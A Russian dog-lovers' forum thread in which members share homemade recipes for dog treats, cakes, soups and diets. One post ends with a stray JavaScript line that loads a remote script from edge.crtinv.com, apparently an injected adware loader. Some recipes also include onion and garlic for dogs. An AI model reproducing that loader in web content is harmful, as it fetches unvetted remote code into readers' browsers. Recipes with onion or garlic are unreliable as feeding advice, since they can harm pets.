Староанглийская овчарка (БОБТЕЙЛ) - ФОРУМ
Здравствуйте Любители Староанглийской овчарки - БОБЕЙЛ и гости нашего форума!!!
Мы рады что вы посетили нас, но гости нашего форума могут читать не все разделы, и видеть ссылки, и видео.
Наши пользователи имеют ряд преимуществ. Зарегистрированные пользователи могут:
1. Создавать темы, участвовать в голосованиях, конкурсах и писать сообщения, видеть все разделы форума, ссылки и видео
2. Видеть виджет "Последние темы форума"
Для зарегистрированных пользователей так же отсутствует реклама.
Пожалуйста, при регистрации на форуме указывайте свое ИМЯ, МЕСТО ПРОЖИВАНИЯ, дату рождения, чтобы другие участники могли сориентироваться, отвечая на ваши вопросы о ветеринарной помощи или покупке щенках, кормов и аксессуаров.
Без этих данных ваш аккаунт не будет активирован, или будет УДАЛЕН!!!
Староанглийская овчарка (БОБТЕЙЛ) - ФОРУМ
Здравствуйте Любители Староанглийской овчарки - БОБЕЙЛ и гости нашего форума!!!
Мы рады что вы посетили нас, но гости нашего форума могут читать не все разделы, и видеть ссылки, и видео.
Наши пользователи имеют ряд преимуществ. Зарегистрированные пользователи могут:
1. Создавать темы, участвовать в голосованиях, конкурсах и писать сообщения, видеть все разделы форума, ссылки и видео
2. Видеть виджет "Последние темы форума"
Для зарегистрированных пользователей так же отсутствует реклама.
Пожалуйста, при регистрации на форуме указывайте свое ИМЯ, МЕСТО ПРОЖИВАНИЯ, дату рождения, чтобы другие участники могли сориентироваться, отвечая на ваши вопросы о ветеринарной помощи или покупке щенках, кормов и аксессуаров.
Без этих данных ваш аккаунт не будет активирован, или будет УДАЛЕН!!!
Староанглийская овчарка (БОБТЕЙЛ) - ФОРУМ

Национальный
 
ФорумФорум  ПорталПортал  ЧаВоЧаВо  ПубликацииПубликации  Последние изображенияПоследние изображения  РегистрацияРегистрация  ВходВход  
DogsFiles.com - international pedigree database.
Наш форум о маниакальной бобтейломании, отягощенной сезонными обострениями бобтейлофилии,
протекающей на фоне хронической вялотекущей бобтейлофрении.
И если у вас уже есть один бобтейл, то вашему супругу стоит нанять двух санитаров,
которые будут ходить за вами всегда и мешать вам завести третьего, четвертого
и пятого бобтейла, потому как,
завести второго вам может помешать только
острый приступ здравомыслия, который, я как врач, спрогнозировать не берусь :-)))


Поделиться
 

 Супер -Кок!

Предыдущая тема Следующая тема Перейти вниз 
АвторСообщение
abigal
Бобтейлопомешанный
Бобтейлопомешанный
abigal



Супер -Кок!  Empty
СообщениеТема: Супер -Кок!    Супер -Кок!  I_icon16Сб 21 Ноя 2009, 11:19

500 г куриной (индюшачьей) печени
6-7 яиц
500 г геркулесовых хлопьев

Печень и яйца смешать в комбайне, вылить в миску и добавить геркулес. (если масса получилась слишком сухая, добавить еще яйцо). Выложить на противень и рапределить ножом. Выпекать при 180 градусах примерно 30 минут. Вынуть и сразу нарезать на кусочки, пока масса мягкая. Дать подсохнуть.
Получаются такие печенья для собак
____________________________________________________________________________________________

500 г говяжьего фарша
200 г куриной печени
1 яйцо
зелень
1 столовая ложка муки

Печень мелко порубить или измельчить в комбайне. Смешать с остальными продуктами и выпекать 30 мин. при температуре 190-200 градусов.
Можно украсить кусочками сосисок.






"Торт ко ДР"
1,5 ст. муки, 1,5 ч.л. воды,1/2 ст. мягкого маргарина,1/2 ст. кукурузного или оливкогого масла,1 банка мясных консервов,4 яйца, 3 полосочки вяленого мяса (можно сосиски), 1 ст. йогурта (без наполнителей), жир для смазки формы.
Приготовление: просеить муку и соду, в миске на средней скорости взбить миксером маргарин, пока он не станет однородно - мягким. Добавьте раст. масло, мясные консервы,яйца. Смешивайте, пока масса не станет однородной.Добавьте муку с содой и продолжайте смешивать на медленной скорости до однородной массы. Переложить смесь в смазанную жиром форму для выпечки. Выпекать 70 минут при 180 С. Достать из духовки и дать остыть несколько минут, потом вынуть из формы. Сделать несклько слоев, каждый слой промазать йогуртом. Сверху украсить вяленым мясом или нарезанными сосисками.

Собачьи суши "Якудза"
1 ст. риса, 3 порции антрекота,свежие помидоры, сыр или любой другой наполнитель по вкусу.
Приготовление:сварить рис, чтобы он получился НЕ рассыпчатый, а липкий (для этого воды должно быть в 1, 5 раза больше, чем риса). Антрекот тщательно отбить, чтоб он стал мах плоским. На антрекот выложить равноерным слоем рис. ПРимерно посередине выложитьнарезанные полосками помидоры или сыр. Медленно и аккуратно начать скручивать рулет. Готовый рулет нарезать на небольшие кусочки - суши готовы!!
Вернуться к началу Перейти вниз
Esmiralda
Бобтейлопомешанный
Бобтейлопомешанный
Esmiralda



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Сб 21 Ноя 2009, 17:25

ХОРОШАЯ темка, бобтейлам понравится. А нам подспорье, а то перед ДР голову сломаешь. У меня муж дня за три начинает ручки выкручивать, что бобтейлам купить, чтобы понос потом не пробрал? Супер -Кок!  903223
Вернуться к началу Перейти вниз
Esmiralda
Бобтейлопомешанный
Бобтейлопомешанный
Esmiralda



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Сб 21 Ноя 2009, 17:26

Давайте рецептами делитесь, люди добрые! Как бобтейлам ДР справляете.
Вернуться к началу Перейти вниз
?????
Гость
Anonymous



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 24 Ноя 2009, 20:28

У нас продается замороженный фарш лосося. Стоит относительно недорого. Наши собачницы посоветовали такой рулет - берешь этот фарш (упаковка на 0,5 кг.) добавляешь два яйца, ложку муки (лучше грубого помола), рубленую зелень (не очень много - а то не все собаки любят) и раскатываешь толстым пластом. Внутрь можно класть все, что угодно вкусного для собаки - мои знакомые клали вареную морковь и тыкву перемешанную с крутым яйцом. Дальше закатываешь все это в рулет и в духовку до готовности. Обязательно поливать в процессе готовки, чтобы рулет не пересох.
Рулет надо остудить и нарезать кусочками. В процессе остывания и нарезания надо проследить, чтобы собаки рядом не было. А то до окочательного варианта (выкладывания на тарелку и украшения зеленью) блюдо не доживает :D .

Пропорции коннечно расчитаны на одну не слишком прожорливую собачку :geek:.
Вернуться к началу Перейти вниз
?????
Гость
Anonymous



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Сб 19 Дек 2009, 18:23

Вот нашла на одном из собачьих сайтов рецепты из кулинарной книги собаковода автора Донна Твичелл Робертс.
Рецепт праздничного торта для собак-
450 г фарша из индейки или курятины
2 морковки, нарезанные кубиками
280 г шпинат, размороженного и отжатого
1 стакан вареного коричневого! риса
1 стол. ложка растительного масла
1 слегка взбитое яйцо
2 сваренных вкрутую и нарезанных яйца

Приготовление
1) Выложите индейку, морковь, шпинат, рис, масло и сырое яйцо в большую миску. Тщательно перемешайте
2) Разложите половину смеси по дну смазанной и застеленной промасленной бумагой формы для выпечки диаметром приб 22.5 см
3)В один слой разложите сверху ломтики вареного яйца , затем накройте их сверху остатками мясной смеси. Выпекайте 40-50мин, предварительно разогрев духовку до 180 гр
4) выньте торт из духовки, дайте постоять в форме 5 мин. большой лопаткой выньте торт, слейте всю жидкость, дайте торту постоять на блюде 15 мин, а затем украсьте и подайте на стол.
рецепт рассчитан на один корж

Примечание:

Чтобы торт получился слоеным - удвойте кол-во продуктов по рецепту и выпеките два одинаковых коржа. выпеченные и охлажденные корживыложите рядом на тарелки. смажьте один корж картофельным пюре, сверху положите корж и также украсьте его пюре.рисовать картофельным пюре звездочки и розетки для свечей можно с помощью кондитерского мешка
Вернуться к началу Перейти вниз
binka
Бобтейлопомешанный
Бобтейлопомешанный
binka



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Сб 05 Июн 2010, 12:15

Мой салат подсолнух.
Салат внутри другой, а снаружи подсолнух. Красиво. Не любим оливки, поэтому без них. Чипсы съедаются первыми:-)

Супер -Кок!  A1336b88511c
Вернуться к началу Перейти вниз
Delight
Бобтейлопомешанный
Бобтейлопомешанный
Delight



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 13 Июл 2010, 19:45

ТОРТ "ЧЕТЫРЕ СОБАЧКИ"

Супер -Кок!  86064ca97ea8


Ингредиенты:

Телятина – 1 кг 500 г
Морковь – 500 г
Нерафинированное подсолнечное масло – 10 г
12 маленьких круглых гранул собачьего корма
Несколько горошин зеленого горошка для украшения
Рафинированное подсолнечное масло для смазывания формы

Пояснения:

Морковь можно полить рафинированным маслом, но оно не такое пахучее, как нерафинированное.
Выделившийся сок после приготовления торта можете использовать как бульон для собачьего супа или просто отдать собаке.
Зеленый горошек может быть консервированный или вареный из наборов с замороженными овощами.
Последователям питания BARF торт можно не выпекать.

Приготовление:

1. Сварить морковь и почистить.
2. Измельчить мясо в блендере до состояния фарша.

Супер -Кок!  0e361572a4a4



3. Разъёмную форму для торта смазать рафинированным подсолнечным маслом.
4. Выложить туда 700 г телячьего фарша, разровнять.

Супер -Кок!  D48339d2afec

5. 300 г моркови натереть на мелкой терке, выложить поверх фарша, разровнять и полить нерафинированным подсолнечным маслом.

Супер -Кок!  7d42840a5f25

6. Поверх морковного слоя выложить 400 г телячьего фарша, разровнять.

Супер -Кок!  055a48610546

7. Из оставшегося фарша (400 г) слепить 4 овальные котлетки, положить их сверху торта.

Супер -Кок!  07dd0f02d319

8. В предварительно разогретую до 180 градусов духовку поставить торт на 40 минут.
9. Слить выделившийся сок и дать торту остыть.
10. Отложить 70 г моркови, остальное нарезать кружочками. Прижать морковные кружочки по кругу сбоку торта.
11. Одну треть оставшейся моркови нарезать кубиками и выложить сверху торта между котлетками.
12. Оставшиеся две трети моркови измельчить до состояния пюре, добавить туда немного мясного сока, выделившегося при приготовлении торта. Вылепить из морковного пюре мордочки, хвостики и ушки, прикрепить их к котлеткам, чтобы получились собачки. Глаза и носы делаем из гранул собачьего корма.

Супер -Кок!  093d89e07d7d

13. Сбрызнуть весь торт мясным соком.
Вернуться к началу Перейти вниз
Esmiralda
Бобтейлопомешанный
Бобтейлопомешанный
Esmiralda



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Чт 15 Июл 2010, 19:04

Супер -Кок!  558203 Delight, Прям, как настоящий торт! Супер -Кок!  568527 Супер -Кок!  89539
Вернуться к началу Перейти вниз
?????
Гость
Anonymous



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Чт 16 Сен 2010, 12:28

ЭХ))))Вот бы на день варенья совего любимца сделать торт в виде бобтейла))))))))))))))))))))))).
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 04 Сен 2012, 10:44

Сторонники натурального питания собак уверены в пользе куриных яиц для растущего организма своих подопечных. И это правда, ведь яйца — продукт сытный и богатый белками, необходимыми для хорошего роста и формирования органов и систем собаки. Белок должен составлять 28—43% от всего корма — это 9 грамм на каждый килограмм массы тела щенка. Куриные яйца на 50% состоят из белка, а вторая половина — жиры, которые очень важны для красивой здоровой шерсти. Но есть тут и подводные камни, не зная о которых можно навредить малышу.

Сырой яичный белок содержит вещество авидин, разрушающее витамин Н (биотин).
Это приводит к нарушениям линьки и возникновению дерматитов у собак. Тяжелый авитаминоз по биотину может привести даже к полному выпадению шерсти.
Очевидно, поэтому организм щенка плохо усваивает яичный белок.

Во избежание всех этих неприятностей, лучше скармливать малышу отдельно сырой желток или вареный белок. Желток лучше всего слегка взбить вилкой и домешать в молоко или кашу. Яйца обязательно должны быть свежими. Изредка можно давать щенку омлет или сваренное всмятку яйцо.
Однако яйца не могут заменить в рационе щенка мясо, поэтому не кормите ими чаще 1—2 раз в неделю.

Вкусный омлет с сыром и брюссельской капустой

Нам потребуются: 3 столовых ложки молока (нежирного), 3 куриных яйца, 3 столовых ложки натертого овечьего сыра, 2 столовые ложки брюссельской капусты. Капусту можно заменить другими мелко нарезанными или натертыми на крупную терку овощами.

Важно! Не нужно добавлять никаких специй или соли! Собаки не нуждаются в усилении вкуса продуктов, а приправы могут нанести серьезный урон их здоровью!
Приготовление: вилкой слегка взбиваем в миске яйца, добавляем к ним молоко. Обжариваем омлет на сковороде с одной стороны, затем переворачиваем его и посыпаем сыром и овощами. Подаем едва теплым.
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 04 Сен 2012, 10:48

Взято ЗДЕСЬ
Продолжаем баловать своих любимцев полезными лакомствами. Сегодня мы будем использовать весьма специфический продукт, запах которого не вызывает аппетита у нас, но для собак служит предметом вожделения. Речь идет о говяжьем рубце.

Рубец — большая часть (80%) желудка, состоящая из гладких мышечных волокон, разновидность субпродуктов. Это один из самых полезных для собак субпродуктов, благодаря высокому содержанию важнейших витаминов В1, В2, РР, а также железа, йода, фосфора, калия, натрия, магния и кальция. Рубец состоит из легкоусвояемых белка и ферментов, что улучшает состояние шерсти и когтей, благотворно сказывается на развитии опорно-двигательного аппарата собак.

Приготовления рубца — несколько трудоемкий процесс, осложненный специфическим запахом субпродукта. Но если вы считаете, что ваша собака заслуживает небольших жертв, тогда приступим.

Приготовления круассанов: 2 этапа

Подготовка начинки — самый длительный процесс. Тщательно промытый рубец зальем холодной водой и оставим вымачиваться на ночь (6—8 часов). Желательно несколько раз за это время сменить воду.

После этого промоем рубец еще раз, затем нарежем на полосы шириной два сантиметра. Их нужно просушить в духовке. Для этого раскладываем полосы рубца на решетке и при очень низкой температуре (рубец должен подсушиться, а не поджариться) оставляем в духовке на два часа и тщательно следиим, чтобы не пересушить.

Полезные советы. Поместите под решетку противень, застеленный пекарской бумагой. Жир будет капать на нее, что сбережет вашу духовку. Включив вытяжку, вы избежите распространения специфического запаха по всему дому. Кстати, запах этот не стойкий и не въедается в поверхность духовки.
Теперь можно приступать к приготовлению теста.
Нам потребуются: 160 грамм муки, 80 грамм овсяных хлопьев, 1 яйцо, 1 среднее яблоко, 1,5 чайной ложки растительного масла, 1 чайная ложка меда, молотая корица на кончике ножа.

Приготовление: измельчаем (в ступке или блендере) овсяные хлопья. Смешиваем хлопья с мукой, добавляем яйцо, натертое на мелкую терку яблоко, корицу, мед и растительное масло. Замешиваем крутое тесто и делим его на три равные части.

Важно! Тесто не должно содержать ни соли, ни сахара. Не переборщите со специями — это приведет к нарушению собачьего обоняния.
Каждую часть теста раскатываем толщиной 2-3 миллиметра. Затем каждый пласт разрезаем ножом на 12 равных секторов-треугольников. Теперь в уголок каждого треугольника выкладываем кусок рубца и плотно закатываем в сторону широкой части сектора так, чтобы получился круассан.

Полученные изделия раскладываем на застеленный пекарской бумагой противень и сушим на небольшом огне в духовке в течение 20—30 минут. Очень важно не пересушить круассаны, чтобы они не стали слишком твердыми для зубов вашей собаки.

Теперь можно радовать с пользой четвероного друга ! Правильно приготовленные круассаны укрепят его зубы и десны, предотвратят образование зубного камня, нормализуют микрофлору кишечника, что благотворно скажется на пищеварении.
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 04 Сен 2012, 10:50

Печенье с говяжьей печенью

Нам потребуются:
130 грамм пшеничной муки, 80 грамм овсяных хлопьев, 50 грамм говяжьей печени, 1 яйцо, 1 ч. ложка растительного масла, 2 бутончика гвоздики, немного воды.

Приготовление:
Тесто готовим по тому же принципу, как и в предыдущем рецепте. Печень для начинки отвариваем в течение 10 минут — пока внутри не останется крови. Нарезаем отваренную и остуженную печень на небольшие кусочки и подсушиваем их на небольшом огне в духовке до консистенции резины. Распределяем печень в тесто так же, как в предыдущем рецепте делали это с курагой и подсушиваем в духовке 20—30
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 04 Сен 2012, 10:52

Супер -Кок!  Dog-bones-baking
Куриный салат
Ингредиенты:
— филе небольшой курицы;
— 2 огурца среднего размера;
— 1 яблоко;
— 100 г ветчины.

Огурец нарезаем соломкой. Яблоко натираем на крупную терку. Филе и ветчину шинкуем на некрупные кусочки. Все ингредиенты перемешиваем и заправляем сметаной.

Бисквиты из печенки

Супер -Кок!  Dog-baking
Используя формочку, собаке можно выпечь «косточки»,
как на иллюстрации в начале статьи
Ингредиенты:
—1,5 ст. пшеничной муки;
— 1 ст. кукурузной муки;
— 400 г печенки;
— 1 яйцо.
Измельчаем печенку при помощи блендера. Добавляем остальные ингредиенты и все тщательно перемешиваем. Смесь выливаем на противень, предварительно смазанный жиром. Выпекаем 20–30 минут в хорошо прогретой духовке. Когда бисквит остынет, нарезаем его на кусочки.

Витаминный обед
Ингредиенты:
— 300 г сырого мяса;
—1/2 дольки чеснока (пропущенного через чесночницу);
— 1 яйцо;
— 2 ст. л. йогурта;
— 1 ч. л. яблочного уксуса;
— 1 ч. л. меда;
— 20 г морской капусты;
— 1/2 ч. л. льняного масла;
—250 мг молотого витамина С;
— 1 ч. л. молотой люцерны.
Все составляющие перемешиваем.

Диетический салат
Ингредиенты:
— 2 ст. бульона;
— 250 г говяжьего фарша;
— 2 ст. л. оливкового масла;
— 50 г листьев салата;
— 1 ст. 1% творога;
— 2 ст. л. отрубей.

Фарш поджариваем на медленном огне, пока не станет рассыпчатым. На дно миски для собаки выкладываем нарезанные листья салата, сверху распределяем мясо и высыпаем отруби. В центре блюда выкладываем творог.
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 25 Сен 2012, 21:08

Приведенные ниже рецепты являются деликатесами,

Деликатесами едва ли стоит баловать собаку каждый день. К тому же они содержат довольно много мяса. Если вы будете пользоваться этими рецептами для ежедневного питания собаки, добавляйте морковь или картофель, а также мучные
продукты.


ПЕЧЕНОЧНЫЕ ПИРОЖНЫЕ КЛЕВЕРА

Этот рецепт мы взяли из книги известного кинолога Ульриха Клевера «Собака как член семьи».

Приготовление отнимет у вас какое- то время, но чего не сделаешь для своего маленького друга!
500г муки,1 стакан воды, 4 яйца, 300г печеночного фарша , соль (майоран).
Воду и яйца смешайте с мукой. Добавьте печенку и размешайте до консистенции мягкого теста. Добавьте приправу. Тесто разложите на доске и разрежьте на кусочки, которые затем опустите в кипящую воду. Когда пирожные всплывут на поверхность, их можно вынимать. Угощение готово. К пирожным можно подать немного слегка поджаренного масла, от которого собаки приходят в восторг.

БИФШТЕКСЫ ЛИНДСТРЕМА.
200 г смеси ячменя, гречки и овса, 1 литр воды, 1/2 кг мясного фарша, 3 свежих протертых свеклы.
Все продукты положить в посуду и поставить томиться в печь на час, время от времени помешивая.

РАЗМАЗНЯ.
200г печени (измельченной или в виде фарша),300 г мясного фарша,200 г темного или неочищенного риса, 100г ячменя, немного воды, щепотка соли.
Довести до готовности на медленном огне, можно добавить немного растительного масла, особенно если у собаки сухая шерсть. Можно добавить также извести ( для растущих и пожилых собак). Смешивая различные крупы и используя крупяные хлопья можно сэкономить время

КАША УРЬОЛА

1л воды, 1 ч.л. соли, 100г молочного порошка, 50 г неочищенного риса, 50 г ячменной крупы, 50 г гречневой крупы, 50 г овсяной крупы, 500 г мясного фарша.
Крупу доведите до кипения и оставьте на ночь. Затем добавьте другие продукты. Печь при температуре около 200 градусов в течении 90-120 мин.
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 25 Сен 2012, 21:10

В приведенных рецептах количество продуктов рассчитано на маленькую собаку весом 4-5 кг.:

Мусака для собак "Ко мне, Мухтар"

150 гр.рубленой говядины 30 гр.лука 1/2 чайн.ложки томатной пасты 1/2 чайн.ложки муки грубого помола или отрубей 1 яйцо 1 чайн.ложка оливкового или кукурузного масла 1/4 стакана сливок Мелко нарубленный репчатый лук обжарить в масле вместе с томатным пюре. Снять с огня и сразу же добавить рубленое мясо. Чуть посолить (вместо соли лучше использовать сухую морскую капусту, ее следует взять немного больше, чем соли), добавить отруби, переложить в маленькую мисочку. Яйцо и сливки смешать и залить этой смесью мясо. Поставить на 10 минут в разогретую духовку или на минутку в микроволновую печь.

Омлет от Питкейрна

Продукты: 1 столовая ложка нежирного сухого молока, 3 яйца среднего размера, 3 столовые ложки натертого сухого овечьего сыра, 2 столовые ложки брюссельской капусты или других мелко нарезанных либо протертых овощей.

Способ приготовления.
Размешать сухое молоко в небольшом количестве воды и разбить туда яйца. Обжарить все на сковороде. Когда омлет будет почти готов, перевернуть омлет и посыпать его сыром, брюссельской капустой или другими овощами. Готовое блюдо свернуть, как обычный омлет (англичане и американцы сворачивают омлет трубочкой). Объем разовой порции составляет один стакан.
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 25 Сен 2012, 21:12

Вегетарианский суп из манной крупы "Артемон"
Для животных, которым нужно поправиться. 1 яйцо 0,5 л.крепкого бульона 2 ст.ложки маной крупы 2 ст.ложки овсяных хлопьев 3 ст.ложки тертого сыра Отлить несколько ложек холодного бульона, добавить в него маную крупу, яйцо, сыр. Остальной бульон довести до кипения и влить в него смесь. Суп должен вариться на очень медленном огне 4-5 минут при постоянном помешивании. снять с огня, добавить овсяные хлопья и морскую капусту.

Суп с фрикадельками "Mon Ami"

1/4 ст.рубленой говядины 1/4 ст.индюшачьего фарша 2 ст.ложки овсяных хлопьев 2 чайн.ложки мелко нарезанной зелени 1 яйцо 1/4 стакана йогурта 2 чайн.ложки репчатого лука 2 стакана воды 2 ложки просеянных пшеничных отрубей Мясо м фарш перемешать с чайной ложкой лука, овсяными хлопьями, чайной ложкой зелени и белком. Добавить соль или сухую морскую капусту. Сформовать крошечные фрикадельки(величиной с ноготь большого пальца), обвалять их в просеянных отрубях.
Смешать йогурт, желтки и оставшиеся отруби. В воду положить оставшийся лук, зелень, соль или морскую капусту. Довести до кипения, добавить овсяные хлопья, прокипятить 5-8 минут. Опустить фрикадельки и кипятить 5 мин. Влить в кипящий суп предварительно приготовленную смесь, довести до кипения и снять с огня. В готовый суп положить кусочек сливочного масла величиной с лесной орех.
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 25 Сен 2012, 21:14

Рецепт Д.С. Кронфельда
2/3 стакана мелко нарезанного или промолотого мяса средней жирности или такое же количество потрохов, языков, сердца, рыбы, птицы, сыра или яиц 1/3 стакана сухого риса 1/6 часть печени, нарезанной кубиками чайная ложка кукурузного масла или маргарина, говяжьего, куриного или др. животного жира чайная ложка костной муки 1/2 чайной ложки йодистой соли 1-1,5 стакана воды Залить водой масло или жир, соль, чеснок. Довести до кипения и оставить на маленьком огне на 15 мин., время от времени перемешивая. Засыпать костную муку, добавить мясо и печень. Держать на маленьком огне еще 15 мин. Снять с огня и дать остыть.

Потроха с овощами "Каштанка"
150 гр. потрохов домашней птицы 100 гр. различных овощей (морковь, сельдерей, корень петрушки, капуста) 1/2 чайной ложки томатной пасты 1 ст. ложка тертого сыра Потроха промыть и варить до полуготовности в чуть подсоленной воде. Откинуть на дуршлаг, дать стечь бульону и мелко нарезать или перемолоть. Овощи мелко нарезать и сварить в бульоне до мягкости, прибавить томатную пасту, довести до кипения и снять с огня. Налить в мисочку горячий суп, раздавить вилкой овощи, добавить тертый сыр, размешать и соединить с измельчеными потрохами.

Тефтели с овощами "Pet Show"
100 гр. рубленого сердца 100 гр. фарша птицы 50 гр. измельченных мозгов 1 небольшая морковь 1 маленькая свекла 1 ст. ложка панировочных сухарей (или отрубей) 1 чайная ложка мелко нарезанного лука 1-2 столовые ложки молока 1 чайная ложка костной муки Вымыть морковь и свеклу, очистить, натереть на терке. Смешать все ингредиенты, сформовать тефтели и запекать в течение 5-10 минут в духовке.

Творожники по-щенячьи
100 гр. творога 1 чайн.ложка сливочного масла 1 желток 70 гр. молотых овсяных хлопьев Растереть творог с маслом и яйцом, смешать с молотыми овсяными хлопьями.
Сформовать из этой массы небольшие шарики. Поставить на водяную баню на 10-15 минут.

Бифштекс из мяса с почками "Собачья работа"
50 гр. говядины 50 гр. телятины 50 гр. почек 100 гр. цветной капусты 1 белок 4 ложки гречневой каши 2-3 ст. ложки молока 2-3 ст. ложки отрубей 1/2 чайн. ложки костной муки Мясо, почки и гречневую кашу пропустить через мясорубку. Добавить белок, молоко и мелко нарезанную цветную капусту, щепотку сухой морской капусты и костную муку. Сформовать небольшие шарики и на несколько минут поставить в разогретую духовку. !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="http://edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 25 Сен 2012, 21:17

Кормите по этой диете собак, страдающих пищевыми аллергиями:

100 грамм фарша из приготовленного мяса кролика или ягненка;
1 стакан отваренного шелушенного риса;
1 чайная ложка растительного масла;
1/2 чайных ложки фосфата кальция (заменитель соли).

Сложите все ингредиенты, хорошо перемешайте.

Выход - 300 грамм, 795 калорий.

Примечание:
Эта диета не сбалансирована, и ею нельзя кормить более 4 недель.


1 чайная ложка фосфата кальция (заменитель соли);
1 чайная ложка карбоната кальция.

Приготовить картофельную муку в соответствии с инструкциями на упаковке, добавлять мед или патоку в процессе перемешивания. Поставить охлаждаться и добавить остальные ингредиенты.
Выход - 1 кг (485 калорий).
По этой диете можно кормить собак максимум на протяжении 4 недель.


Двухдневная диета

Возьмите отваренного белого или шелушенного риса и приготовленного нежирного мяса (вареного цыпленка, нежирную рыбу, нежирную порубленную говядину или порубленную индейку) в пропорции 4 части риса к одной части мяса. Смешайте рис и мясо, добавьте щепотку соли. Если хотите сделать пищу похожей на суп, добавьте кокосового молока. Этой пищи хватит собаке, весящей приблизительно 15 килограммов.


Домашняя диета при заболевании почек

Хотя эта диета хорошо сбалансирована и собаку можно кормить согласно этой диете очень долгое время, она не является оптимальной, и поэтому ее необходимо заменить диетой, прописанной ветеринаром через 5-7 дней:

100 грамм говяжьего фарша (не использовать нежирное мясо);
1 большое яйцо, сваренное вкрутую;
2 стакана отваренного риса;
3 ломтя белого покрошенного хлеба;
1 чайная ложка карбоната кальция.

Поджарьте мясо, сохраняя жир. Добавьте оставшиеся ингредиенты и перемешайте, добавьте воды, чтобы пища была рыхлой. 750 калорий.
Выход: для мелких и средних собак - 1 порция.
Для крупных собак - полпорции.
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 25 Сен 2012, 21:19

Куриная печень по-собачьи

Это блюдо содержит натуральный белок, витамин А, витамин D и железо:

0,5 кг куриных печенок;
1/3 стакана цельной пшеничной муки;
2 яйца, хорошо взбитых;
щепотка соли;
3 столовые ложки подсолнечного масла.

Разбейте яйца в миску. Добавьте соли. Положите куриные печенки в яйцо так, чтобы они покрывались полностью. Поместите муку в контейнер вместе с куриными печенками. Трясите до тех пор, пока печенки полностью не покроются мукой. Поместите в холодильник на 1-6 часов. Когда придет время жарить печенки, налейте масло на сковородку так, чтобы оно покрывало дно. Дайте возможность маслу нагреться, после этого положите печенки на сковородку. Жарьте на среднем огне. Когда одна сторона печенки поджарится, переверните ее на другую сторону. Выньте печенки со сковородки и дайте им остыть. Они будут свежими в течение 3-4 дней, если хранить их в холодильнике. Перед тем как давать их собаке, подогрейте в микроволновой печи.
Вернуться к началу Перейти вниз
Abigal1
Бобтейлопомешанный
Бобтейлопомешанный
Abigal1



Супер -Кок!  Empty
СообщениеТема: Re: Супер -Кок!    Супер -Кок!  I_icon16Вт 25 Сен 2012, 21:22

Плов для собак

Ингредиенты:
на 1 кг мяса
300г крупы 1/2 риса, 1/2 гречки или одного вида
50г моркови
30г постного масла
1 зубчик чеснока
немного соли Приготовление: Все варить вместе до готовности.

Холодец

Ингредиенты:
2 говяжьи ножки
1-2 куриных или индюшиных ножек (по желанию)
1 морковь,
1 зубчик чеснока
немного соли

Приготовление
все ингредиенты складываем в большую кастрюлю, заливаем большим количеством воды и варим на медленном огне, пока мясо не отойдет от костей - около 5 часов. Затем выбираем и выбрасываем кости. мясо складываем в посуду и заливаем бульоном, можно добавить немного желатина, растворив его предварительно в теплой воде. Остужаем в холодильнике - можно давать собакам.


Вкусный рецепт с высоким содержанием кальция

Использовать как вспомогательное питание для беременных собак и для щенят:

1 яйцо всмятку;
1/2 чайную ложку меда;
1 щепотку соли;
1/2 чайную ложку пшеничных ростков;
1 миска готовой овсянки;
2 полоски пожаренного бекона;
1/4 стакана молока без лактозы.

Положите все ингредиенты в миску. Хорошо перемешайте и можно подавать.

Примечание:
- Для взрослых крупных и гигантских собак использовать 3/4 стакана воды на 1 стакан овсянки. Этого хватит на две порции.
- Для взрослых средних и мелких собак использовать 1 стакан воды на 1/2 стакана овсянки. Этого хватит на одну порцию.
